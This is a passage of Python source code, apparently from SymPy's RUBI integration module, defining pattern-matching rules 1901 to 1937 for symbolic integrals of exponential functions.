AlgebraicFunctionQ, Coeff, LeadTerm, RemainingTerms, LeadFactor,
RemainingFactors, LeadBase, LeadDegree, Numer, Denom, hypergeom, Expon,
MergeMonomials, PolynomialDivide, BinomialQ, TrinomialQ,
GeneralizedBinomialQ, GeneralizedTrinomialQ, FactorSquareFreeList,
PerfectPowerTest, SquareFreeFactorTest, RationalFunctionQ,
RationalFunctionFactors, NonrationalFunctionFactors, Reverse,
RationalFunctionExponents, RationalFunctionExpand, ExpandIntegrand,
SimplerQ, SimplerSqrtQ, SumSimplerQ, BinomialDegree, TrinomialDegree,
CancelCommonFactors, SimplerIntegrandQ, GeneralizedBinomialDegree,
GeneralizedBinomialParts, GeneralizedTrinomialDegree,
GeneralizedTrinomialParts, MonomialQ, MonomialSumQ,
MinimumMonomialExponent, MonomialExponent, LinearMatchQ,
PowerOfLinearMatchQ, QuadraticMatchQ, CubicMatchQ, BinomialMatchQ,
TrinomialMatchQ, GeneralizedBinomialMatchQ, GeneralizedTrinomialMatchQ,
QuotientOfLinearsMatchQ, PolynomialTermQ, PolynomialTerms,
NonpolynomialTerms, PseudoBinomialParts, NormalizePseudoBinomial,
PseudoBinomialPairQ, PseudoBinomialQ, PolynomialGCD, PolyGCD,
AlgebraicFunctionFactors, NonalgebraicFunctionFactors,
QuotientOfLinearsP, QuotientOfLinearsParts, QuotientOfLinearsQ,
Flatten, Sort, AbsurdNumberQ, AbsurdNumberFactors,
NonabsurdNumberFactors, SumSimplerAuxQ, Prepend, Drop,
CombineExponents, FactorInteger, FactorAbsurdNumber,
SubstForInverseFunction, SubstForFractionalPower,
SubstForFractionalPowerOfQuotientOfLinears,
FractionalPowerOfQuotientOfLinears, SubstForFractionalPowerQ,
SubstForFractionalPowerAuxQ, FractionalPowerOfSquareQ,
FractionalPowerSubexpressionQ, Apply, FactorNumericGcd,
MergeableFactorQ, MergeFactor, MergeFactors, TrigSimplifyQ,
TrigSimplify, TrigSimplifyRecur, Order, FactorOrder, Smallest,
OrderedQ, MinimumDegree, PositiveFactors, Sign, NonpositiveFactors,
PolynomialInAuxQ, PolynomialInQ, ExponentInAux, ExponentIn,
PolynomialInSubstAux, PolynomialInSubst, Distrib, DistributeDegree,
FunctionOfPower, DivideDegreesOfFactors, MonomialFactor, FullSimplify,
FunctionOfLinearSubst, FunctionOfLinear, NormalizeIntegrand,
NormalizeIntegrandAux, NormalizeIntegrandFactor,
NormalizeIntegrandFactorBase, NormalizeTogether,
NormalizeLeadTermSigns, AbsorbMinusSign, NormalizeSumFactors,
SignOfFactor, NormalizePowerOfLinear, SimplifyIntegrand, SimplifyTerm,
TogetherSimplify, SmartSimplify, SubstForExpn, ExpandToSum, UnifySum,
UnifyTerms, UnifyTerm, CalculusQ, FunctionOfInverseLinear,
PureFunctionOfSinhQ, PureFunctionOfTanhQ, PureFunctionOfCoshQ,
IntegerQuotientQ, OddQuotientQ, EvenQuotientQ, FindTrigFactor,
FunctionOfSinhQ, FunctionOfCoshQ, OddHyperbolicPowerQ, FunctionOfTanhQ,
FunctionOfTanhWeight, FunctionOfHyperbolicQ, SmartNumerator,
SmartDenominator, SubstForAux, ActivateTrig, ExpandTrig, TrigExpand,
SubstForTrig, SubstForHyperbolic, InertTrigFreeQ, LCM,
SubstForFractionalPowerOfLinear, FractionalPowerOfLinear,
InverseFunctionOfLinear, InertTrigQ, InertReciprocalQ, DeactivateTrig,
FixInertTrigFunction, DeactivateTrigAux, PowerOfInertTrigSumQ,
PiecewiseLinearQ, KnownTrigIntegrandQ, KnownSineIntegrandQ,
KnownTangentIntegrandQ, KnownCotangentIntegrandQ,
KnownSecantIntegrandQ, TryPureTanSubst, TryTanhSubst, TryPureTanhSubst,
AbsurdNumberGCD, AbsurdNumberGCDList, ExpandTrigExpand,
ExpandTrigReduce, ExpandTrigReduceAux, NormalizeTrig, TrigToExp,
ExpandTrigToExp, TrigReduce, FunctionOfTrig, AlgebraicTrigFunctionQ,
FunctionOfHyperbolic, FunctionOfQ, FunctionOfExpnQ, PureFunctionOfSinQ,
PureFunctionOfCosQ, PureFunctionOfTanQ, PureFunctionOfCotQ,
FunctionOfCosQ, FunctionOfSinQ, OddTrigPowerQ, FunctionOfTanQ,
FunctionOfTanWeight, FunctionOfTrigQ, FunctionOfDensePolynomialsQ,
FunctionOfLog, PowerVariableExpn, PowerVariableDegree,
PowerVariableSubst, EulerIntegrandQ, FunctionOfSquareRootOfQuadratic,
SquareRootOfQuadraticSubst, Divides, EasyDQ, ProductOfLinearPowersQ,
Rt, NthRoot, AtomBaseQ, SumBaseQ, NegSumBaseQ, AllNegTermQ,
SomeNegTermQ, TrigSquareQ, RtAux, TrigSquare, IntSum, IntTerm, Map2,
ConstantFactor, SameQ, ReplacePart, CommonFactors,
MostMainFactorPosition, FunctionOfExponentialQ, FunctionOfExponential,
FunctionOfExponentialFunction, FunctionOfExponentialFunctionAux,
FunctionOfExponentialTest, FunctionOfExponentialTestAux, stdev,
rubi_test, If, IntQuadraticQ, IntBinomialQ, RectifyTangent,
RectifyCotangent, Inequality, Condition, Simp, SimpHelp, SplitProduct,
SplitSum, SubstFor, SubstForAux, FresnelS, FresnelC, Erfc, Erfi, Gamma,
FunctionOfTrigOfLinearQ, ElementaryFunctionQ, Complex, UnsameQ,
_SimpFixFactor, SimpFixFactor, _FixSimplify, FixSimplify,
_SimplifyAntiderivativeSum, SimplifyAntiderivativeSum,
_SimplifyAntiderivative, SimplifyAntiderivative, _TrigSimplifyAux,
TrigSimplifyAux, Cancel, Part, PolyLog, D, Dist, Sum_doit, PolynomialQuotient, Floor,
PolynomialRemainder, Factor, PolyLog, CosIntegral, SinIntegral, LogIntegral, SinhIntegral,
CoshIntegral, Rule, Erf, PolyGamma, ExpIntegralEi, ExpIntegralE, LogGamma , UtilityOperator, Factorial,
Zeta, ProductLog, DerivativeDivides, HypergeometricPFQ, IntHide, OneQ, Null, rubi_exp as exp, rubi_log as log, Discriminant,
Negative, Quotient
)
from sympy import (Integral, S, sqrt, And, Or, Integer, Float, Mod, I, Abs, simplify, Mul,
Add, Pow, sign, EulerGamma)
from sympy.integrals.rubi.symbol import WC
from sympy.core.symbol import symbols, Symbol
from sympy.functions import (sin, cos, tan, cot, csc, sec, sqrt, erf)
from sympy.functions.elementary.hyperbolic import (acosh, asinh, atanh, acoth, acsch, asech, cosh, sinh, tanh, coth, sech, csch)
from sympy.functions.elementary.trigonometric import (atan, acsc, asin, acot, acos, asec, atan2)
from sympy import pi as Pi
A_, B_, C_, F_, G_, H_, a_, b_, c_, d_, e_, f_, g_, h_, i_, j_, k_, l_, m_, n_, p_, q_, r_, t_, u_, v_, s_, w_, x_, y_, z_ = [WC(i) for i in 'ABCFGHabcdefghijklmnpqrtuvswxyz']
a1_, a2_, b1_, b2_, c1_, c2_, d1_, d2_, n1_, n2_, e1_, e2_, f1_, f2_, g1_, g2_, n1_, n2_, n3_, Pq_, Pm_, Px_, Qm_, Qr_, Qx_, jn_, mn_, non2_, RFx_, RGx_ = [WC(i) for i in ['a1', 'a2', 'b1', 'b2', 'c1', 'c2', 'd1', 'd2', 'n1', 'n2', 'e1', 'e2', 'f1', 'f2', 'g1', 'g2', 'n1', 'n2', 'n3', 'Pq', 'Pm', 'Px', 'Qm', 'Qr', 'Qx', 'jn', 'mn', 'non2', 'RFx', 'RGx']]
i, ii , Pqq, Q, R, r, C, k, u = symbols('i ii Pqq Q R r C k u')
_UseGamma = False
ShowSteps = False
StepCounter = None
def exponential(rubi):
from sympy.integrals.rubi.constraints import cons31, cons168, cons515, cons1098, cons1099, cons3, cons7, cons27, cons48, cons125, cons208, cons4, cons94, cons17, cons18, cons21, cons1100, cons128, cons2, cons244, cons137, cons552, cons1101, cons1102, cons5, cons380, cons54, cons1103, cons1104, cons1105, cons209, cons224, cons796, cons797, cons50, cons1106, cons804, cons1107, cons812, cons1108, cons1109, cons1110, cons1111, cons584, cons1112, cons1113, cons479, cons480, cons1114, cons196, cons23, cons1115, cons53, cons1116, cons1117, cons1118, cons1119, cons85, cons1120, cons356, cons531, cons1121, cons1122, cons535, cons93, cons1123, cons1124, cons176, cons367, cons166, cons744, cons68, cons840, cons1125, cons1126, cons1127, cons25, cons71, cons1128, cons1129, cons1130, cons818, cons1131, cons1132, cons1133, cons1134, cons819, cons1135, cons1136, cons1137, cons1138, cons148, cons810, cons811, cons1139, cons1140, cons52, cons800, cons1141, cons1142, cons1143, cons813, cons1144, cons226, cons62, cons1145, cons1146, cons1147, cons1148, cons1149, cons1150, cons1151, cons463, cons1152, cons43, cons448, cons1153, cons1154, cons1155, cons1017
pattern1901 = Pattern(Integral((F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1)))*WC('b', S(1)))**WC('n', S(1))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons3, cons7, cons27, cons48, cons125, cons208, cons4, cons31, cons168, cons515, cons1098)
def replacement1901(m, f, g, b, d, c, n, x, F, e):
rubi.append(1901)
return -Dist(d*m/(f*g*n*log(F)), Int((F**(g*(e + f*x))*b)**n*(c + d*x)**(m + S(-1)), x), x) + Simp((F**(g*(e + f*x))*b)**n*(c + d*x)**m/(f*g*n*log(F)), x)
rule1901 = ReplacementRule(pattern1901, replacement1901)
pattern1902 = Pattern(Integral((F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1)))*WC('b', S(1)))**WC('n', S(1))*(x_*WC('d', S(1)) + WC('c', S(0)))**m_, x_), cons1099, cons3, cons7, cons27, cons48, cons125, cons208, cons4, cons31, cons94, cons515, cons1098)
def replacement1902(m, f, g, b, d, c, n, x, F, e):
rubi.append(1902)
return -Dist(f*g*n*log(F)/(d*(m + S(1))), Int((F**(g*(e + f*x))*b)**n*(c + d*x)**(m + S(1)), x), x) + Simp((F**(g*(e + f*x))*b)**n*(c + d*x)**(m + S(1))/(d*(m + S(1))), x)
rule1902 = ReplacementRule(pattern1902, replacement1902)
pattern1903 = Pattern(Integral(F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1)))/(x_*WC('d', S(1)) + WC('c', S(0))), x_), cons1099, cons7, cons27, cons48, cons125, cons208, cons1098)
def replacement1903(f, g, d, c, x, F, e):
rubi.append(1903)
return Simp(F**(g*(-c*f/d + e))*ExpIntegralEi(f*g*(c + d*x)*log(F)/d)/d, x)
rule1903 = ReplacementRule(pattern1903, replacement1903)
pattern1904 = Pattern(Integral(F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1)))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons7, cons27, cons48, cons125, cons208, cons17)
def replacement1904(m, f, g, d, c, x, F, e):
rubi.append(1904)
return Simp(F**(g*(-c*f/d + e))*f**(-m + S(-1))*g**(-m + S(-1))*(-d)**m*Gamma(m + S(1), -f*g*(c + d*x)*log(F)/d)*log(F)**(-m + S(-1)), x)
rule1904 = ReplacementRule(pattern1904, replacement1904)
pattern1905 = Pattern(Integral(F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1)))/sqrt(x_*WC('d', S(1)) + WC('c', S(0))), x_), cons1099, cons7, cons27, cons48, cons125, cons208, cons1098)
def replacement1905(f, g, d, c, x, F, e):
rubi.append(1905)
return Dist(S(2)/d, Subst(Int(F**(g*(-c*f/d + e) + f*g*x**S(2)/d), x), x, sqrt(c + d*x)), x)
rule1905 = ReplacementRule(pattern1905, replacement1905)
pattern1906 = Pattern(Integral(F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1)))*(x_*WC('d', S(1)) + WC('c', S(0)))**m_, x_), cons1099, cons7, cons27, cons48, cons125, cons208, cons21, cons18)
def replacement1906(m, f, g, d, c, x, F, e):
rubi.append(1906)
return -Simp(F**(g*(-c*f/d + e))*(-f*g*log(F)/d)**(-IntPart(m) + S(-1))*(-f*g*(c + d*x)*log(F)/d)**(-FracPart(m))*(c + d*x)**FracPart(m)*Gamma(m + S(1), -f*g*(c + d*x)*log(F)/d)/d, x)
rule1906 = ReplacementRule(pattern1906, replacement1906)
pattern1907 = Pattern(Integral((F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1)))*WC('b', S(1)))**n_*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons3, cons7, cons27, cons48, cons125, cons208, cons21, cons4, cons1100)
def replacement1907(m, f, g, b, d, c, n, x, F, e):
rubi.append(1907)
return Dist(F**(-g*n*(e + f*x))*(F**(g*(e + f*x))*b)**n, Int(F**(g*n*(e + f*x))*(c + d*x)**m, x), x)
rule1907 = ReplacementRule(pattern1907, replacement1907)
pattern1908 = Pattern(Integral((a_ + (F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1)))**WC('p', S(1))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons21, cons4, cons128)
def replacement1908(p, m, f, g, b, d, c, n, a, x, F, e):
rubi.append(1908)
return Int(ExpandIntegrand((c + d*x)**m, (a + b*(F**(g*(e + f*x)))**n)**p, x), x)
rule1908 = ReplacementRule(pattern1908, replacement1908)
pattern1909 = Pattern(Integral((x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1))/(a_ + (F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons4, cons31, cons168)
def replacement1909(m, f, g, b, d, c, n, a, x, F, e):
rubi.append(1909)
return Dist(d*m/(a*f*g*n*log(F)), Int((c + d*x)**(m + S(-1))*log(a*(F**(g*(e + f*x)))**(-n)/b + S(1)), x), x) - Simp((c + d*x)**m*log(a*(F**(g*(e + f*x)))**(-n)/b + S(1))/(a*f*g*n*log(F)), x)
rule1909 = ReplacementRule(pattern1909, replacement1909)
def With1910(p, m, f, g, b, d, c, n, a, x, F, e):
u = IntHide((a + b*(F**(g*(e + f*x)))**n)**p, x)
rubi.append(1910)
return -Dist(d*m, Int(u*(c + d*x)**(m + S(-1)), x), x) + Dist((c + d*x)**m, u, x)
pattern1910 = Pattern(Integral((a_ + (F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1)))**p_*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons4, cons244, cons168, cons137)
rule1910 = ReplacementRule(pattern1910, With1910)
pattern1911 = Pattern(Integral(u_**WC('m', S(1))*((F_**(v_*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1)) + WC('a', S(0)))**WC('p', S(1)), x_), cons1099, cons2, cons3, cons208, cons4, cons5, cons552, cons1101, cons1102, cons17)
def replacement1911(v, p, u, m, g, b, a, n, x, F):
rubi.append(1911)
return Int((a + b*(F**(g*ExpandToSum(v, x)))**n)**p*NormalizePowerOfLinear(u, x)**m, x)
rule1911 = ReplacementRule(pattern1911, replacement1911)
def With1912(v, p, u, m, g, b, a, n, x, F):
uu = NormalizePowerOfLinear(u, x)
z = Symbol('z')
z = If(And(PowerQ(uu), FreeQ(Part(uu, S(2)), x)), Part(uu, S(1))**(m*Part(uu, S(2))), uu**m)
z = If(And(PowerQ(uu), FreeQ(Part(uu, 2), x)), Part(uu, 1)**(m*Part(uu, 2)), uu**m)
return Simp(uu**m*Int(z*(a + b*(F**(g*ExpandToSum(v, x)))**n)**p, x)/z, x)
pattern1912 = Pattern(Integral(u_**WC('m', S(1))*((F_**(v_*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1)) + WC('a', S(0)))**WC('p', S(1)), x_), cons1099, cons2, cons3, cons208, cons21, cons4, cons5, cons552, cons1101, cons1102, cons18)
rule1912 = ReplacementRule(pattern1912, With1912)
pattern1913 = Pattern(Integral((a_ + (F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1)))**WC('p', S(1))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons21, cons4, cons5, cons380)
def replacement1913(p, m, f, g, b, d, c, n, a, x, F, e):
rubi.append(1913)
return Int((a + b*(F**(g*(e + f*x)))**n)**p*(c + d*x)**m, x)
rule1913 = ReplacementRule(pattern1913, replacement1913)
pattern1914 = Pattern(Integral((x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1))*(F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1))/(a_ + (F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons4, cons31, cons168)
def replacement1914(m, f, g, b, d, c, n, a, x, F, e):
rubi.append(1914)
return -Dist(d*m/(b*f*g*n*log(F)), Int((c + d*x)**(m + S(-1))*log(S(1) + b*(F**(g*(e + f*x)))**n/a), x), x) + Simp((c + d*x)**m*log(S(1) + b*(F**(g*(e + f*x)))**n/a)/(b*f*g*n*log(F)), x)
rule1914 = ReplacementRule(pattern1914, replacement1914)
pattern1915 = Pattern(Integral((x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1))*((F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1)) + WC('a', S(0)))**WC('p', S(1))*(F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons21, cons4, cons5, cons54)
def replacement1915(p, m, f, g, b, d, a, n, c, x, F, e):
rubi.append(1915)
return -Dist(d*m/(b*f*g*n*(p + S(1))*log(F)), Int((a + b*(F**(g*(e + f*x)))**n)**(p + S(1))*(c + d*x)**(m + S(-1)), x), x) + Simp((a + b*(F**(g*(e + f*x)))**n)**(p + S(1))*(c + d*x)**m/(b*f*g*n*(p + S(1))*log(F)), x)
rule1915 = ReplacementRule(pattern1915, replacement1915)
pattern1916 = Pattern(Integral((x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1))*((F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1)) + WC('a', S(0)))**WC('p', S(1))*(F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons21, cons4, cons5, cons1103)
def replacement1916(p, m, f, g, b, d, a, n, c, x, F, e):
rubi.append(1916)
return Int((a + b*(F**(g*(e + f*x)))**n)**p*(c + d*x)**m*(F**(g*(e + f*x)))**n, x)
rule1916 = ReplacementRule(pattern1916, replacement1916)
pattern1917 = Pattern(Integral((G_**((x_*WC('i', S(1)) + WC('h', S(0)))*WC('j', S(1)))*WC('k', S(1)))**WC('q', S(1))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1))*((F_**((x_*WC('f', S(1)) + WC('e', S(0)))*WC('g', S(1))))**WC('n', S(1))*WC('b', S(1)) + WC('a', S(0)))**WC('p', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons224, cons796, cons797, cons21, cons4, cons5, cons50, cons1104, cons1105)
def replacement1917(p, j, k, m, f, g, b, i, d, G, a, n, c, x, h, q, e, F):
rubi.append(1917)
return Dist((G**(j*(h + i*x))*k)**q*(F**(g*(e + f*x)))**(-n), Int((a + b*(F**(g*(e + f*x)))**n)**p*(c + d*x)**m*(F**(g*(e + f*x)))**n, x), x)
rule1917 = ReplacementRule(pattern1917, replacement1917)
pattern1918 = Pattern(Integral((F_**((x_*WC('b', S(1)) + WC('a', S(0)))*WC('c', S(1))))**WC('n', S(1)), x_), cons1099, cons2, cons3, cons7, cons4, cons1106)
def replacement1918(b, c, n, a, x, F):
rubi.append(1918)
return Simp((F**(c*(a + b*x)))**n/(b*c*n*log(F)), x)
rule1918 = ReplacementRule(pattern1918, replacement1918)
pattern1919 = Pattern(Integral(F_**(v_*WC('c', S(1)))*u_, x_), cons1099, cons7, cons804, cons552, cons1107)
def replacement1919(v, u, c, x, F):
rubi.append(1919)
return Int(ExpandIntegrand(F**(c*ExpandToSum(v, x))*u, x), x)
rule1919 = ReplacementRule(pattern1919, replacement1919)
pattern1920 = Pattern(Integral(F_**(v_*WC('c', S(1)))*u_, x_), cons1099, cons7, cons804, cons552, cons1098)
def replacement1920(v, u, c, x, F):
rubi.append(1920)
return Int(ExpandIntegrand(F**(c*ExpandToSum(v, x)), u, x), x)
rule1920 = ReplacementRule(pattern1920, replacement1920)
pattern1921 = Pattern(Integral(F_**(v_*WC('c', S(1)))*u_**WC('m', S(1))*w_, x_), cons1099, cons7, cons21, cons812, cons1108)
def replacement1921(v, w, u, m, c, x, F):
rubi.append(1921)
return Simp(F**(c*v)*u**(m + S(1))*Coefficient(w, x, S(1))/(c*Coefficient(u, x, S(1))*Coefficient(v, x, S(1))*log(F)), x)
rule1921 = ReplacementRule(pattern1921, replacement1921)
pattern1922 = Pattern(Integral(F_**(v_*WC('c', S(1)))*u_**WC('m', S(1))*w_, x_), cons1099, cons7, cons1109, cons552, cons1101, cons17, cons1107)
def replacement1922(v, w, u, m, c, x, F):
rubi.append(1922)
return Int(ExpandIntegrand(F**(c*ExpandToSum(v, x))*w*NormalizePowerOfLinear(u, x)**m, x), x)
rule1922 = ReplacementRule(pattern1922, replacement1922)
pattern1923 = Pattern(Integral(F_**(v_*WC('c', S(1)))*u_**WC('m', S(1))*w_, x_), cons1099, cons7, cons1109, cons552, cons1101, cons17, cons1098)
def replacement1923(v, w, u, m, c, x, F):
rubi.append(1923)
return Int(ExpandIntegrand(F**(c*ExpandToSum(v, x)), w*NormalizePowerOfLinear(u, x)**m, x), x)
rule1923 = ReplacementRule(pattern1923, replacement1923)
def With1924(v, w, u, m, c, x, F):
uu = NormalizePowerOfLinear(u, x)
z = Symbol('z')
z = If(And(PowerQ(uu), FreeQ(Part(uu, S(2)), x)), Part(uu, S(1))**(m*Part(uu, S(2))), uu**m)
z = If(And(PowerQ(uu), FreeQ(Part(uu, 2), x)), Part(uu, 1)**(m*Part(uu, 2)), uu**m)
return Simp(uu**m*Int(ExpandIntegrand(F**(c*ExpandToSum(v, x))*w*z, x), x)/z, x)
pattern1924 = Pattern(Integral(F_**(v_*WC('c', S(1)))*u_**WC('m', S(1))*w_, x_), cons1099, cons7, cons21, cons1109, cons552, cons1101, cons18)
rule1924 = ReplacementRule(pattern1924, With1924)
pattern1925 = Pattern(Integral(F_**((x_*WC('b', S(1)) + WC('a', S(0)))*WC('c', S(1)))*(e_ + (x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1))*log(x_*WC('d', S(1))))*log(x_*WC('d', S(1)))**WC('n', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons4, cons1110, cons1111, cons584)
def replacement1925(f, b, g, d, c, n, a, x, h, F, e):
rubi.append(1925)
return Simp(F**(c*(a + b*x))*e*x*log(d*x)**(n + S(1))/(n + S(1)), x)
rule1925 = ReplacementRule(pattern1925, replacement1925)
pattern1926 = Pattern(Integral(F_**((x_*WC('b', S(1)) + WC('a', S(0)))*WC('c', S(1)))*x_**WC('m', S(1))*(e_ + (x_*WC('g', S(1)) + WC('f', S(0)))*WC('h', S(1))*log(x_*WC('d', S(1))))*log(x_*WC('d', S(1)))**WC('n', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons208, cons209, cons21, cons4, cons1112, cons1111, cons584)
def replacement1926(m, f, b, g, d, c, n, a, x, h, F, e):
rubi.append(1926)
return Simp(F**(c*(a + b*x))*e*x**(m + S(1))*log(d*x)**(n + S(1))/(n + S(1)), x)
rule1926 = ReplacementRule(pattern1926, replacement1926)
pattern1927 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))*WC('b', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons1113)
def replacement1927(b, d, c, a, x, F):
rubi.append(1927)
return Simp(F**(a + b*(c + d*x))/(b*d*log(F)), x)
rule1927 = ReplacementRule(pattern1927, replacement1927)
pattern1928 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**S(2)*WC('b', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons479)
def replacement1928(b, d, c, a, x, F):
rubi.append(1928)
return Simp(F**a*sqrt(Pi)*Erfi((c + d*x)*Rt(b*log(F), S(2)))/(S(2)*d*Rt(b*log(F), S(2))), x)
rule1928 = ReplacementRule(pattern1928, replacement1928)
pattern1929 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**S(2)*WC('b', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons480)
def replacement1929(b, d, c, a, x, F):
rubi.append(1929)
return Simp(F**a*sqrt(Pi)*Erf((c + d*x)*Rt(-b*log(F), S(2)))/(S(2)*d*Rt(-b*log(F), S(2))), x)
rule1929 = ReplacementRule(pattern1929, replacement1929)
pattern1930 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons1114, cons196)
def replacement1930(b, d, c, a, n, x, F):
rubi.append(1930)
return -Dist(b*n*log(F), Int(F**(a + b*(c + d*x)**n)*(c + d*x)**n, x), x) + Simp(F**(a + b*(c + d*x)**n)*(c + d*x)/d, x)
rule1930 = ReplacementRule(pattern1930, replacement1930)
def With1931(b, d, c, a, n, x, F):
k = Denominator(n)
rubi.append(1931)
return Dist(k/d, Subst(Int(F**(a + b*x**(k*n))*x**(k + S(-1)), x), x, (c + d*x)**(S(1)/k)), x)
pattern1931 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons1114, cons23)
rule1931 = ReplacementRule(pattern1931, With1931)
pattern1932 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons4, cons1115)
def replacement1932(b, d, c, a, n, x, F):
rubi.append(1932)
return -Simp(F**a*(-b*(c + d*x)**n*log(F))**(-S(1)/n)*(c + d*x)*Gamma(S(1)/n, -b*(c + d*x)**n*log(F))/(d*n), x)
rule1932 = ReplacementRule(pattern1932, replacement1932)
pattern1933 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('f', S(1)) + WC('e', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons4, cons53, cons1116)
def replacement1933(m, f, b, d, c, a, n, x, F, e):
rubi.append(1933)
return Simp(F**(a + b*(c + d*x)**n)*(c + d*x)**(-n)*(e + f*x)**n/(b*f*n*log(F)), x)
rule1933 = ReplacementRule(pattern1933, replacement1933)
pattern1934 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))/(x_*WC('f', S(1)) + WC('e', S(0))), x_), cons1099, cons2, cons3, cons7, cons27, cons48, cons125, cons4, cons1116)
def replacement1934(f, b, d, c, a, n, x, F, e):
rubi.append(1934)
return Simp(F**a*ExpIntegralEi(b*(c + d*x)**n*log(F))/(f*n), x)
rule1934 = ReplacementRule(pattern1934, replacement1934)
pattern1935 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons21, cons4, cons1117)
def replacement1935(m, b, d, c, a, n, x, F):
rubi.append(1935)
return Dist(S(1)/(d*(m + S(1))), Subst(Int(F**(a + b*x**S(2)), x), x, (c + d*x)**(m + S(1))), x)
rule1935 = ReplacementRule(pattern1935, replacement1935)
pattern1936 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons31, cons1118, cons1119, cons85, cons1120)
def replacement1936(m, b, d, c, a, n, x, F):
rubi.append(1936)
return -Dist((m - n + S(1))/(b*n*log(F)), Int(F**(a + b*(c + d*x)**n)*(c + d*x)**(m - n), x), x) + Simp(F**(a + b*(c + d*x)**n)*(c + d*x)**(m - n + S(1))/(b*d*n*log(F)), x)
rule1936 = ReplacementRule(pattern1936, replacement1936)
pattern1937 = Pattern(Integral(F_**((x_*WC('d', S(1)) + WC('c', S(0)))**n_*WC('b', S(1)) + WC('a', S(0)))*(x_*WC('d', S(1)) + WC('c', S(0)))**WC('m', S(1)), x_), cons1099, cons2, cons3, cons7, cons27, cons21, cons4, cons1118, cons1119, cons356, cons531)
def replacement1937(m, b, d, c, a, n, x, F):
rubi.append(1937)
return -Dist((m - n + S(1))/(b*n*log(F)), Int(F**(a + b*(c + d*x)**n)*(c + d*x)**(m - n), x), x) + Simp(F**(a + b*(c + d*x)**n)*(c + d*x)**(m - n + S(1))/(b*d*n*log(F)), x)
